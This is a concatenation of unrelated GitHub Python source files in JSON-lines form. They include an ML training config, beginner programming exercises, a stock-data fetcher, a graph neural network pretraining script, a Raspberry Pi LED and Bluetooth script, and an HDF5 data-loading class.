use_sb3=args.use_sb3)\n","repo_name":"brantondemoss/DITTO","sub_path":"src/config/new_config.py","file_name":"new_config.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"22102635904","text":"import sys\nnumber_of_films = int(input())\nmax_rating = -sys.maxsize\nmin_rating = sys.maxsize\ntotal_rating = 0\ncondition = False\nfor i in range(number_of_films+1):\n name_of_movie = input()\n rating = float(input())\n if rating > max_rating:\n max_rating = rating\n total_rating += rating\n condition = True\n if rating < min_rating:\n min_rating = rating\n total_rating += rating\n condition = True\nif condition:\n print(f\"{name_of_movie} is with highest rating: {rating}\")\nelse:\n print(f\"{name_of_movie} is with lowest rating: {rating}\")\naverage_rating = total_rating / number_of_films\nprint(f\"{average_rating:.2}\")","repo_name":"SilviaGadzhalova/SoftUni-Python-Basic_2021_09","sub_path":"exam/movie_rating.py","file_name":"movie_rating.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4375839786","text":"import os\nimport sys\n\nsys.path.append(os.path.curdir)\nimport tensorflow as tf\nimport pandas as pd\nimport sys\nimport tensorflow.keras.backend as K\nimport argparse\nimport pickle\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-lr\", type=float, help='Learning rate',default = 1e-3)\nparser.add_argument(\"-bs\", type=int, help='batch_size', default= 32)\nparser.add_argument(\"-p\", type=float, help='loss constraint for covariance learning',default = 1e-3)\nparser.add_argument(\"-S\", type=int, help='cell_size',default=16)\nparser.add_argument(\"-epochs\", type=int, help='number of epochs',default=20)\nparser.add_argument(\"-f\", \"--fff\", help=\"a dummy argument to fool ipython\", default=\"1\")\nparsarg = vars(parser.parse_args())\n\n\n################################### HYPERPARAMETERS ###########################################################\n\n\n\nproba_near = 1 / 3\nproba_far = 1 / 3\nproba_same = 1 / 3\n\nbatch_size = parsarg.get('bs')\nnb_epoch = parsarg.get('epochs')\nlr = parsarg.get('lr')\np = parsarg.get('p')\ncell_size = parsarg.get('S')\n\nx_0 = -0.3\nb = 30\nsize_encode = 100\nparameters = {}\nparameters['dim'] = 256\nparameters['S'] = cell_size\nparameters['batch size'] = 16\nparameters['epoch'] = 60\nparameters['learning rate'] = 1e-4\nparameters['p'] = 1e-2\n\n\n# create a binary pickle file \nf = open(\"training_params.pkl\",\"wb\")\n# write the python object (dict) to pickle file\npickle.dump(parameters,f)\n# close file\nf.close()\n\n\npath_data = '/home/ahabis/CompNet/datas'\npath_monuseg = '/home/ahabis/sshfs/monuseg'\npath_weights = '/home/ahabis/CompNet/weights/weights'\n\n\n#################################### LIST OF PATHS ############################################################\npath_monuseg_train = os.path.join(path_monuseg, 'patch_vahadane_train')\npath_monuseg_test = os.path.join(path_monuseg, 'patch_vahadane_test')\npath_monuseg_test_images = os.path.join(path_monuseg, 'MoNuSegTestData/tissue_images')\n\npath_click_train = os.path.join(path_monuseg, 'click_train')\npath_click_test = os.path.join(path_monuseg, 'click_test')\n\npath_stardist_train = os.path.join(path_monuseg, 'patch_stardist_train')\npath_stardist_test = os.path.join(path_monuseg, 'patch_stardist_test')\n\npath_gt_train = os.path.join(path_monuseg, 'patch_gt_train')\npath_gt_test = os.path.join(path_monuseg, 'patch_gt_test')\n\npath_contour_stardist_train = os.path.join(path_monuseg, 'contour_stardist_train')\npath_contour_stardist_test = os.path.join(path_monuseg, 'contour_stardist_test')\n\npath_contour_gt_train = os.path.join(path_monuseg, 'contour_gt_train')\npath_contour_gt_test = os.path.join(path_monuseg, 'contour_gt_test')\n\npath_H_train = os.path.join(path_monuseg, 'patch_H_train')\npath_E_train = os.path.join(path_monuseg, 'patch_E_train')\n\npath_H_test = os.path.join(path_monuseg, 'patch_H_test')\npath_E_test = os.path.join(path_monuseg, 'patch_E_test')\n\npath_click_gen_test = os.path.join(path_monuseg,'click_gen_test')\npath_click_gen_train = os.path.join(path_monuseg,'click_gen_train')\n\n############################################# DATAFRAMES #####################################################\n\nfar_df_test = pd.read_csv(os.path.join(path_data, 'far_df_test_50.csv'), index_col=0)\nfar_df_train = pd.read_csv(os.path.join(path_data, 'far_df_train_50.csv'), index_col=0)\ndf_distances_train = pd.read_csv(os.path.join(path_data, 'df_distances_train_20.csv'), index_col=0)\ndf_distances_test = pd.read_csv(os.path.join(path_data, 'df_distances_test_20.csv'), index_col=0)\n\n############################################# LOSSES ##########################################################\n\n\ndef weighted_binary_crossentropy(zero_weight, one_weight):\n\n def weighted_binary_crossentropy(y_true, y_pred):\n\n b_ce = K.binary_crossentropy(y_true, y_pred)\n\n weight_vector = y_true * one_weight + (1 - y_true) * zero_weight\n weighted_b_ce = weight_vector * b_ce\n\n return K.mean(weighted_b_ce)\n\n return weighted_binary_crossentropy\n\n\nwbce = weighted_binary_crossentropy(0.3,0.7)\n\nbce = tf.keras.losses.BinaryCrossentropy()\nmse = tf.keras.losses.MeanSquaredError()\n\n\n\ndef loss_cov(y_true,y_pred):\n\n angle_true, y_true_var = tf.split(y_true, [1, 2], axis=-1)\n angle_pred, y_pred_var = tf.split(y_pred, [1, 2], axis=-1)\n \n return tf.math.reduce_mean((angle_true - angle_pred)**2, keepdims = True, axis = -1) + tf.math.reduce_mean((y_true_var - y_pred_var)**2, keepdims = True, axis = -1)\n\n\ndef own_loss(y_true, y_pred):\n\n F, svd_true = tf.split(y_true, [1,3], axis = -1)\n svd_pred = y_pred\n\n return tf.math.reduce_mean(tf.math.multiply(F, loss_cov(svd_true,svd_pred))) \n\n\n\ndef own_metric(y_true,y_pred):\n y_true_p,_= tf.split(y_true,[1,3], axis = -1)\n y_pred_p,_= tf.split(y_pred,[1,3], axis = -1)\n return tf.math.sqrt(tf.math.reduce_mean((y_true_p - y_pred_p)**2))\n\n\n################################################################################################################\n\n# MIN = - 465.83\nMAX = 2445.44\n\n############################################ TRAINING PARAMETERS ##############################################\n\nlr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n parameters['learning rate'],\n decay_steps=100,\n decay_rate=0.96,\n staircase=True)\n\nopt = tf.keras.optimizers.Adam(lr_schedule)\nrmse = tf.keras.metrics.RootMeanSquaredError(name='root_mean_squared_error', dtype=None)\n\nmetrics = {\"output_1\": None,\n \"output_2\":own_metric,\n \"output_3\":rmse}\n\nlosses = {'output_1':bce,\n 'output_2':own_loss,\n 'output_3':wbce}\n\nloss_weights = {'output_1':0,\n 'output_2':1,\n 'output_3':1}\n\n\n\n\n\ncallback = tf.keras.callbacks.ModelCheckpoint(\n path_weights, monitor='val_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', save_freq='epoch',\n options=None)\n\n","repo_name":"antoinehabis/CompNet","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5638652303","text":"#CTI-110\r\n#P4HW3_FACTORIAL\r\n#Stephon Smith\r\n#June 28, 2018\r\n#\r\n\r\nnum = int(input(\"Please enter a number: \")) #get number\r\nwhile num < 1:\r\n num = int(input(\"Please enter a positive number please: \")) #Make sure its not a negative\r\n\r\nfct = 1\r\n\r\nfor ctn in range( 1, num+1): #calculate\r\n fct = fct * ctn\r\nprint(\"\\nThe factorial of\", num, \"is\", fct) #print factorial\r\n","repo_name":"TheWiiz/CTI110","sub_path":"P4HW3_FACTORIAL_SmithStephon.py","file_name":"P4HW3_FACTORIAL_SmithStephon.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70678947922","text":"class WebOperation:\n @staticmethod\n def fetchSymbolData(symbol,from_date,to_date):\n import nsepy\n import time\n t1=time.time()\n print(\"fetching data from \",from_date,\" to \",to_date,\"for \",symbol)\n symbol_data = nsepy.get_history(symbol, from_date ,to_date )\n print(\"found records for \",symbol,symbol_data.shape,\" in \",time.time()-t1,\"Seconds\")\n return symbol_data\n","repo_name":"lirilkumar/MoveMarket","sub_path":"WebServices/WebOP.py","file_name":"WebOP.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"23943615412","text":"import argparse\nfrom functools import partial\n\nfrom loader import MoleculeDataset\nfrom dataloader import DataLoaderMasking, DataLoaderMaskingPred # , DataListLoader\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom model import GNN, GNNDecoder, CG\nfrom sklearn.metrics import roc_auc_score\n\nfrom splitters import scaffold_split, random_split, random_scaffold_split\nimport pandas as pd\n\nfrom util import MaskAtom\n\nfrom torch_geometric.nn import global_add_pool, global_mean_pool, global_max_pool\n\nfrom tensorboardX import SummaryWriter\n\nimport timeit\n\n\ndef compute_accuracy(pred, target):\n return float(torch.sum(torch.max(pred.detach(), dim=1)[1] == target).cpu().item()) / len(pred)\n\n\ndef sce_loss(x, y, alpha=1):\n x = F.normalize(x, p=2, dim=-1)\n y = F.normalize(y, p=2, dim=-1)\n\n # loss = - (x * y).sum(dim=-1)\n # loss = (x_h - y_h).norm(dim=1).pow(alpha)\n\n loss = (1 - (x * y).sum(dim=-1)).pow_(alpha)\n\n loss = loss.mean()\n return loss\n\n\ndef train_mae(args, model, loader, optimizer_model, device):\n\n\n model.train()\n loss_accum = 0\n\n epoch_iter = tqdm(loader, desc=\"Iteration\")\n for step, batch in enumerate(epoch_iter):\n batch = batch.to(device)\n loss = model(batch)\n\n # acc_node = compute_accuracy(pred_node, batch.mask_node_label[:,0])\n # acc_node_accum += acc_node\n\n optimizer_model.zero_grad()\n loss.backward()\n optimizer_model.step()\n model.update_target_network(0.9999)\n loss_accum += float(loss.cpu().item())\n epoch_iter.set_description(f\"train_loss: {loss.item():.4f}\")\n\n return loss_accum / step # , acc_node_accum/step, acc_edge_accum/step\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')\n parser.add_argument('--device', type=int, default=0,\n help='which gpu to use if any (default: 0)')\n parser.add_argument('--batch_size', type=int, default=256,\n help='input batch size for training (default: 256)')\n parser.add_argument('--epochs', type=int, default=100,\n help='number of epochs to train (default: 100)')\n parser.add_argument('--lr', type=float, default=0.001,\n help='learning rate (default: 0.001)')\n parser.add_argument('--decay', type=float, default=0,\n help='weight decay (default: 0)')\n parser.add_argument('--num_layer', type=int, default=5,\n help='number of GNN message passing layers (default: 5).')\n parser.add_argument('--emb_dim', type=int, default=300,\n help='embedding dimensions (default: 300)')\n parser.add_argument('--dropout_ratio', type=float, default=0.0,\n help='dropout ratio (default: 0)')\n parser.add_argument('--mask_rate', type=float, default=0.3,\n help='dropout ratio (default: 0.15)')\n parser.add_argument('--mask_edge', type=int, default=0,\n help='whether to mask edges or not together with atoms')\n parser.add_argument('--JK', type=str, default=\"last\",\n help='how the node features are combined across layers. last, sum, max or concat')\n parser.add_argument('--dataset', type=str, default='zinc_standard_agent',\n help='root directory of dataset for pretraining')\n parser.add_argument('--output_model_file', type=str, default='', help='filename to output the model')\n parser.add_argument('--gnn_type', type=str, default=\"gin\")\n parser.add_argument('--seed', type=int, default=0, help=\"Seed for splitting dataset.\")\n parser.add_argument('--num_workers', type=int, default=2, help='number of workers for dataset loading')\n parser.add_argument('--input_model_file', type=str, default=None)\n parser.add_argument(\"--alpha_l\", type=float, default=1.0)\n parser.add_argument(\"--alpha\", type=float, default=0.5)\n parser.add_argument(\"--loss_fn\", type=str, default=\"sce\")\n parser.add_argument(\"--decoder\", type=str, default=\"gin\")\n parser.add_argument(\"--use_scheduler\", action=\"store_true\", default=False)\n args = parser.parse_args()\n print(args)\n\n torch.manual_seed(0)\n np.random.seed(0)\n device = torch.device(\"cuda:\" + str(args.device)) if torch.cuda.is_available() else torch.device(\"cpu\")\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(0)\n\n print(\"num layer: %d mask rate: %f mask edge: %d\" % (args.num_layer, args.mask_rate, args.mask_edge))\n\n dataset_name = args.dataset\n # set up dataset and transform function.\n # dataset = MoleculeDataset(\"dataset/\" + args.dataset, dataset=args.dataset, transform = MaskAtom(num_atom_type = 119, num_edge_type = 5, mask_rate = args.mask_rate, mask_edge=args.mask_edge))\n dataset = MoleculeDataset(\"/home/yhkj/dhr/KDD/chem/dataset/\" + dataset_name, dataset=dataset_name)\n\n # loader = DataLoaderMasking(dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)\n loader = DataLoaderMaskingPred(dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers,\n mask_rate=args.mask_rate, mask_edge=args.mask_edge)\n\n # set up models, one for pre-training and one for context embeddings\n model = CG(args.num_layer, args.emb_dim, drop_ratio=args.dropout_ratio, gnn_type=args.gnn_type, alpha=args.alpha).to(\n device)\n # linear_pred_atoms = torch.nn.Linear(args.emb_dim, 119).to(device)\n # linear_pred_bonds = torch.nn.Linear(args.emb_dim, 4).to(device)\n\n # NUM_NODE_ATTR = 119 # + 3\n # atom_pred_decoder = GNNDecoder(args.emb_dim, NUM_NODE_ATTR, JK=args.JK, gnn_type=args.gnn_type).to(device)\n\n # model_list = [model, atom_pred_decoder]\n\n # set up optimizers\n optimizer_model = optim.Adam(model.trainable_parameters(), lr=args.lr, weight_decay=args.decay)\n # optimizer_dec_pred_atoms = optim.Adam(atom_pred_decoder.parameters(), lr=args.lr, weight_decay=args.decay)\n\n # optimizer_list = [optimizer_model, optimizer_dec_pred_atoms]\n\n for epoch in range(1, args.epochs + 1):\n print(\"====epoch \" + str(epoch))\n\n # train_loss, train_acc_atom, train_acc_bond = train(args, model_list, loader, optimizer_list, device)\n # print(train_loss, train_acc_atom, train_acc_bond)\n\n train_loss = train_mae(args, model, loader, optimizer_model, device)\n\n output_file = f\"_{args.gnn_type}_{args.mask_rate}_{args.alpha}\"\n torch.save(model.state_dict(), output_file + \".pth\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DuanhaoranCC/Masked_Graph_Aug","sub_path":"chem/pretraining.py","file_name":"pretraining.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6220480382","text":"import RPi.GPIO as GPIO\nimport time\nfrom bluetooth import *\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n#led configuration\nled1=14\nled2=15\npwm_pin=13\n\nGPIO_out=[led1,led2,pwm_pin]\nGPIO.setup(GPIO_out,GPIO.OUT)\n#GPIO.setup(pir,GPIO.IN)\n\nserver = BluetoothSocket(RFCOMM)\nserver.bind((\"\", PORT_ANY))\nserver.listen(3)\nprint(\"start server...\")\n\np1=GPIO.PWM(led1,70)\np2=GPIO.PWM(led2,70)\np1.start(0)\np2.start(0)\np = GPIO.PWM(pwm_pin, 100)\n\n\ntry:\n client, info = server.accept()\n print(\"client mac:\", info[0], \", port:\", info[1])\nexcept KeyboardInterrupt:\n server.close()\n exit()\n\ndef dual():\n print('LED fading effect!')\n #client.send('LED fading effect!'.encode())\n for dc in range(0, 101, 5):\n p1.ChangeDutyCycle(dc)\n p2.ChangeDutyCycle(100 - dc)\n time.sleep(0.03)\n\n for dc in range(0, 101, 5):\n p1.ChangeDutyCycle(100 - dc)\n p2.ChangeDutyCycle(dc)\n time.sleep(0.03)\n\ndef sensor():\n p.start(100)\n p.ChangeDutyCycle(90)\n p.ChangeFrequency(261)\n time.sleep(1)\n #p.stop()\n\n print(\"Intruders!\")\n #client.send('Intruders!'.encode())\n GPIO.output(led1, True)\n time.sleep(0.8)\n\n # elif (count==0):\n # print(\"Now in safe!\")\n # #client.send('Now in safe!'.encode())\n #\n # time.sleep(0.8)\n\ntry:\n while True:\n #data = client.recv(1024)\n count=int(input(\"count=\"))\n sensor(count)\n dual(count)\n\n#\n#\nexcept KeyboardInterrupt:\n print(\"terminate\")\n# client.close()\n# server.close()\n","repo_name":"jieuihong/CountOnMe","sub_path":"codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38331228198","text":"\"\"\"\nRead the data saved by model_input_data_process.py\nand make available for model training and testing\n\"\"\"\n\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport h5py\n\n# locations={ \"train_test_datadir\":\"/project/spice/radiation/ML/CRM/data/models/datain\"}\n\nclass Data_IO_validation(object):\n def __init__(self, region, locations):\n self.region = region\n self.locations = locations\n\n def get_data(self, subdomain): \n dataset_file = \"{0}/validation_{1}/validation_data_{1}_{2}.hdf5\".format(self.locations[\"train_test_datadir\"],self.region, str(subdomain).zfill(3))\n print(\"Reading dataset file: {0}\".format(dataset_file))\n dataset=h5py.File(dataset_file,'r')\n\n self.q_tot_test = dataset[\"q_tot_test\"]\n self.q_tot_adv_test = dataset[\"q_adv_test\"]\n self.theta_test = dataset[\"air_potential_temperature_test\"]\n self.theta_adv_test = dataset[\"t_adv_test\"]\n self.sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n self.shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n self.lhf_test = dataset[\"surface_upward_latent_heat_flux_test\"]\n self.theta_phys_test = dataset[\"t_phys_test\"]\n self.qphys_test = dataset[\"q_phys_test\"]\n\nclass Data_IO(object):\n def __init__(self, region, locations):\n self.region = region\n self.locations = locations\n \n dataset_file = \"{0}/train_test_data_{1}.hdf5\".format(self.locations[\"train_test_datadir\"],self.region)\n print(\"Reading dataset file: {0}\".format(dataset_file))\n dataset=h5py.File(dataset_file,'r')\n \n self.q_tot_train = dataset[\"q_tot_train\"]\n self.q_tot_adv_train = dataset[\"q_adv_train\"]\n self.theta_train = dataset[\"air_potential_temperature_train\"]\n self.theta_adv_train = dataset[\"t_adv_train\"]\n self.sw_toa_train = dataset[\"toa_incoming_shortwave_flux_train\"]\n self.shf_train = dataset[\"surface_upward_sensible_heat_flux_train\"]\n self.lhf_train = dataset[\"surface_upward_latent_heat_flux_train\"]\n self.theta_phys_train = dataset[\"t_phys_train\"]\n self.qphys_train = dataset[\"q_phys_train\"]\n\n\n self.q_tot_test = dataset[\"q_tot_test\"]\n self.q_tot_adv_test = dataset[\"q_adv_test\"]\n self.theta_test = dataset[\"air_potential_temperature_test\"]\n self.theta_adv_test = dataset[\"t_adv_test\"]\n self.sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n self.shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n self.lhf_test = dataset[\"surface_upward_latent_heat_flux_test\"]\n self.theta_phys_test = dataset[\"t_phys_test\"]\n self.qphys_test = dataset[\"q_phys_test\"]\n\n\n \n \n # self.train_data_in, self.train_data_out, self.test_data_in, self.test_data_out = self.scm_model_data()\n\n # self.q_norm_train = self.train_data_in[\"qtot\"]\n # self.qnext_norm_train = self.train_data_in[\"qtot_next\"]\n # self.q_norm_train_s = self.train_data_in[\"qtot_s\"]\n # self.qnext_norm_train_s = self.train_data_in[\"qtot_next_s\"]\n # # self.qadv_norm_train = self.train_data_in[\"qadv\"]\n # self.qadv_dot_norm_train = self.train_data_in[\"qadv_dot\"]\n # self.qadv_dot_norm_train_s = self.train_data_in[\"qadv_dot_s\"]\n # # self.qphys_norm_train = self.train_data_out[\"qphys_tot\"]\n # self.qphys_dot_norm_train = self.train_data_out[\"qphys_dot\"]\n # self.qphys_dot_norm_train_s = self.train_data_out[\"qphys_dot_s\"]\n\n # self.q_norm_test = self.test_data_in[\"qtot_test\"]\n # self.qnext_norm_test = self.test_data_in[\"qtot_next_test\"]\n # self.q_norm_test_s = self.test_data_in[\"qtot_test_s\"]\n # self.qnext_norm_test_s = self.test_data_in[\"qtot_next_test_s\"]\n # # self.qadv_norm_test = self.test_data_in[\"qadv_test\"]\n # self.qadv_dot_norm_test = self.test_data_in[\"qadv_dot_test\"]\n # self.qadv_dot_norm_test_s = self.test_data_in[\"qadv_dot_test_s\"]\n # # self.qphys_norm_test = self.test_data_out[\"qphys_test\"]\n # self.qphys_dot_norm_test = self.test_data_out[\"qphys_dot_test\"]\n # self.qphys_dot_norm_test_s = self.test_data_out[\"qphys_dot_test_s\"]\n # # self.qadd_train = self.train_data_in[\"qadd\"]\n # self.qadd_dot_train = self.train_data_in[\"qadd_dot\"]\n # self.qadd_dot_train_s = self.train_data_in[\"qadd_dot_s\"]\n # # self.qadd_test = self.test_data_in[\"qadd_test\"]\n # self.qadd_dot_test = self.test_data_in[\"qadd_dot_test\"]\n # self.qadd_dot_test_s = self.test_data_in[\"qadd_dot_test_s\"]\n # self.q_test_raw = self.test_data_in[\"qtot_test_raw\"]\n # self.q_test_raw_s = self.test_data_in[\"qtot_test_raw_s\"]\n # # self.qadv_test_raw = self.test_data_in[\"qadv_test_raw\"]\n # self.qadv_dot_test_raw = self.test_data_in[\"qadv_dot_test_raw\"]\n # self.qadv_dot_test_raw_s = self.test_data_in[\"qadv_dot_test_raw_s\"]\n # # self.qphys_test_raw = self.test_data_out[\"qphys_test_raw\"]\n # self.qphys_dot_test_raw = self.test_data_out[\"qphys_dot_test_raw\"]\n # self.qphys_dot_test_raw_s = self.test_data_out[\"qphys_dot_test_raw_s\"]\n \n # self.t_train = self.train_data_in[\"T\"]\n # self.t_test = self.test_data_in[\"T_test\"]\n # self.tadv_dot_train = self.train_data_in[\"tadv_dot\"]\n # self.tadv_dot_test = self.test_data_in[\"tadv_dot_test\"]\n\n # self.lhf_train = self.train_data_in['latent_up']\n # self.lhf_test = self.test_data_in['latent_up_test']\n # self.shf_train = self.train_data_in['sensible_up']\n # self.shf_test = self.test_data_in['sensible_up_test']\n # self.toa_swdown_train = self.train_data_in['sw_toa_down']\n # self.toa_swdown_test = self.test_data_in['sw_toa_down_test']\n\n\n # def scm_model_data(self):\n # \"\"\"\n # Data for model with all SCM type inputs and outputs\n # \"\"\"\n # # dataset_file = \"train_test_data_all_m1p1{0}.npz\".format(region)\n # # dataset=np.load(\"{0}/{1}\".format(locations[\"train_test_datadir\"],dataset_file))\n # dataset_file = \"{0}/train_test_data_all_{1}_std.hdf5\".format(self.locations[\"train_test_datadir\"],self.region)\n # dataset=h5py.File(dataset_file,'r')\n \n # q_tot_train = dataset[\"q_tot_train\"]\n # q_tot_adv_train = dataset[\"q_adv_train\"]\n # theta_train = dataset[\"air_potential_temperature_train\"]\n # theta_adv_train = dataset[\"t_adv_train\"]\n # sw_toa_train = dataset[\"toa_incoming_shortwave_flux_train\"]\n # shf_train = dataset[\"surface_upward_sensible_heat_flux_train\"]\n # lhf_train = dataset[\"surface_upward_latent_heat_flux\"]\n # theta_phys_train = dataset[\"t_phys\"]\n # qphys_train = dataset[\"q_phys\"]\n\n\n # train_data_in = {\"qtot_train\":q_tot_train, \"qadv_train\":q_tot_adv_train, \"theta_train\":theta_train, \"theta_adv_train\":theta_adv_train, \"shf_train\":shf_train, \"lhf_train\":lhf_train, \"sw_toa_train\":sw_toa_train}\n # train_data_out = {\"theta_phys_train\":theta_phys_train, \"qphys_train\":qphys_train}\n\n # q_tot_test = dataset[\"q_tot_test\"]\n # q_tot_adv_test = dataset[\"q_adv_test\"]\n # theta_test = dataset[\"air_potential_temperature_test\"]\n # theta_adv_test = dataset[\"t_adv_test\"]\n # sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n # shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n # lhf_test = dataset[\"surface_upward_latent_heat_flux\"]\n # theta_phys_test = dataset[\"t_phys\"]\n # qphys_test = dataset[\"q_phys\"]\n\n\n # test_data_in = {\"qtot_test\":q_tot_test, \"qadv_test\":q_tot_adv_test, \"theta_test\":theta_test, \"theta_adv_test\":theta_adv_test, \"shf_test\":shf_test, \"lhf_test\":lhf_test, \"sw_toa_test\":sw_toa_test}\n # test_data_out = {\"theta_phys_test\":theta_phys_test, \"qphys_test\":qphys_test}\n \n # return train_data_in, train_data_out, test_data_in, test_data_out\n\n # qtot = dataset[\"qtot\"]\n # qtot_next = dataset[\"qtot_next\"]\n # qtot_s = dataset[\"qtot_s\"]\n # qtot_next_s = dataset[\"qtot_next_s\"]\n # # qphys_tot = dataset[\"qphys_tot\"]\n # qphys_dot = dataset[\"qphys_dot\"]\n # qphys_dot_s = dataset[\"qphys_dot_s\"]\n # # qadv = dataset[\"qadv\"]\n # qadv_dot = dataset[\"qadv_dot\"]\n # qadv_dot_s = dataset[\"qadv_dot_s\"]\n # # qadd = dataset[\"qadd\"]\n # qadd_dot = dataset[\"qadd_dot\"] #qtot + qadv_dot*600. \n # qadd_dot_s = dataset[\"qadd_dot_s\"] #qtot + qadv_dot*600. \n # # tadd = dataset[\"tadd\"]\n # tadd_dot = dataset[\"tadd_dot\"] \n # T = dataset[\"T\"]\n # tphys = dataset[\"tphys\"]\n # # tadv = dataset[\"tadv\"]\n # tadv_dot = dataset[\"tadv_dot\"]\n # sw_toa_down = dataset[\"sw_toa_down\"]\n # latent_up = dataset[\"latent_up\"]\n # sensible_up = dataset[\"sensible_up\"]\n # mslp = dataset[\"mslp\"]\n # sw_toa_up = dataset[\"sw_toa_up\"]\n # lw_toa_up = dataset[\"lw_toa_up\"]\n # sw_down = dataset[\"sw_down\"]\n # lw_down = dataset[\"lw_down\"]\n # rain = dataset[\"rain\"]\n # snow = dataset[\"snow\"]\n # # train_model_data_in = np.concatenate((qtot, qadv, T, tadv, sw_toa_down, latent_up, sensible_up, mslp), axis=1)\n # # train_model_data_out = np.concatenate((qphys_tot, tphys, sw_toa_up, lw_toa_up, sw_down, lw_down, rain, snow), axis=1)\n\n # qtot_test = dataset[\"qtot_test\"]\n # qtot_next_test = dataset[\"qtot_next_test\"]\n # qtot_test_s = dataset[\"qtot_test_s\"]\n # qtot_next_test_s = dataset[\"qtot_next_test_s\"]\n # # qphys_test = dataset[\"qphys_test\"] \n # qphys_dot_test = dataset[\"qphys_dot_test\"] \n # qphys_dot_test_s = dataset[\"qphys_dot_test_s\"] \n # # qadv_test = dataset[\"qadv_test\"]\n # qadv_dot_test = dataset[\"qadv_dot_test\"]\n # qadv_dot_test_s = dataset[\"qadv_dot_test_s\"]\n # # qadd_test = dataset[\"qadd_test\"]\n # qadd_dot_test = dataset[\"qadd_dot_test\"]\n # qadd_dot_test_s = dataset[\"qadd_dot_test_s\"]\n # # tadd_test = dataset[\"tadd_test\"]\n # tadd_dot_test = dataset[\"tadd_dot_test\"]\n # T_test = dataset[\"T_test\"]\n # tphys_test = dataset[\"tphys_test\"]\n # # tadv_test = dataset[\"tadv_test\"]\n # tadv_dot_test = dataset[\"tadv_dot_test\"]\n # sw_toa_down_test = dataset[\"sw_toa_down_test\"]\n # latent_up_test = dataset[\"latent_up_test\"]\n # sensible_up_test = dataset[\"sensible_up_test\"]\n # mslp_test = dataset[\"mslp_test\"]\n # sw_toa_up_test = dataset[\"sw_toa_up_test\"]\n # lw_toa_up_test = dataset[\"lw_toa_up_test\"]\n # sw_down_test = dataset[\"sw_down_test\"]\n # lw_down_test = dataset[\"lw_down_test\"]\n # rain_test = dataset[\"rain_test\"]\n # snow_test = dataset[\"snow_test\"]\n\n # qtot_test_raw = dataset[\"qtot_test_raw\"]\n # qtot_test_raw_s = dataset[\"qtot_test_raw_s\"]\n # # qadv_test_raw = dataset[\"qadv_test_raw\"]\n # qadv_dot_test_raw = dataset[\"qadv_dot_test_raw\"]\n # qadv_dot_test_raw_s = dataset[\"qadv_dot_test_raw_s\"]\n # # qadd_test_raw = dataset[\"qadd_test_raw\"] \n # qadd_dot_test_raw = dataset[\"qadd_dot_test_raw\"]\n # qadd_dot_test_raw_s = dataset[\"qadd_dot_test_raw_s\"]\n # # tadd_test_raw = dataset[\"tadd_test_raw\"] \n # tadd_dot_test_raw = dataset[\"tadd_dot_test_raw\"]\n # # qphys_test_raw = dataset[\"qphys_test_raw\"]\n # qphys_dot_test_raw = dataset[\"qphys_dot_test_raw\"]\n # qphys_dot_test_raw_s = dataset[\"qphys_dot_test_raw_s\"]\n # qadd_test_raw = qtot_test_raw[:] + qadv_dot_test_raw[:] \n # qadd_test_raw_s = qtot_test_raw_s[:] + qadv_dot_test_raw_s[:] \n # # test_model_data_in = np.concatenate((qtot_test, qadv_test, T_test, tadv_test, sw_toa_down_test, latent_up_test, sensible_up_test, mslp_test), axis=1)\n # # test_model_data_out = np.concatenate((qphys_test, tphys_test, sw_toa_up_test, lw_toa_up_test, sw_down_test, lw_down_test, rain_test, snow_test), axis=1)\n\n # train_data_in = {\"qtot\":qtot, \"qtot_s\":qtot_s, \"qtot_next\":qtot_next, \"qtot_next_s\":qtot_next_s, \"qadv_dot\":qadv_dot, \"qadv_dot_s\":qadv_dot_s, \"qadd_dot\":qadd_dot, \"qadd_dot_s\":qadd_dot_s, \"T\":T, \"tadv_dot\":tadv_dot, \"sw_toa_down\":sw_toa_down, \"latent_up\":latent_up, \"sensible_up\":sensible_up, \"mslp\":mslp}\n # train_data_out = {\"qphys_dot\":qphys_dot, \"qphys_dot_s\":qphys_dot_s, \"tphys\":tphys, \"sw_toa_up\":sw_toa_up, \"lw_toa_up\":lw_toa_up, \"sw_down\":sw_down, \"lw_down\":lw_down, \"rain\":rain, \"snow\":snow}\n # test_data_in = {\"qtot_test\":qtot_test, \"qtot_next_test\":qtot_next_test, \"qtot_test_s\":qtot_test_s, \"qtot_next_test_s\":qtot_next_test_s, \"qadv_dot_test\":qadv_dot_test, \"qadv_dot_test_s\":qadv_dot_test_s, 